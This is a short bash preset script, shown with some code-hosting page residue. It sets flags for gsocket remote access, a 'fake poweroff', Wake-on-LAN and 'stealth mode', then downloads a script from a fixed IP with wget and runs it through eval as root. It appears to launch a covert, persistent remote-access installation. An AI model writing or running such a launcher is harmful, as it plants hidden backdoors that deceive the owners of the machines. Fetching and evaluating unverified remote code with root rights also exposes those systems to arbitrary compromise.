12 lines
312 B
Bash
Executable File
12 lines
312 B
Bash
Executable File
#!/bin/bash
|
|
# Full installation preset - requires root
|
|
export NO_ROOT=false
|
|
export NO_SERVICES=false
|
|
export INSTALL_WOL=true
|
|
export INSTALL_FAKE_POWEROFF=true
|
|
export INSTALL_GSOCKET=true
|
|
export STEALTH_MODE=true
|
|
|
|
# Download and run the main script with sudo
|
|
eval "$(wget -qO- http://192.168.0.104/deployment/y")
|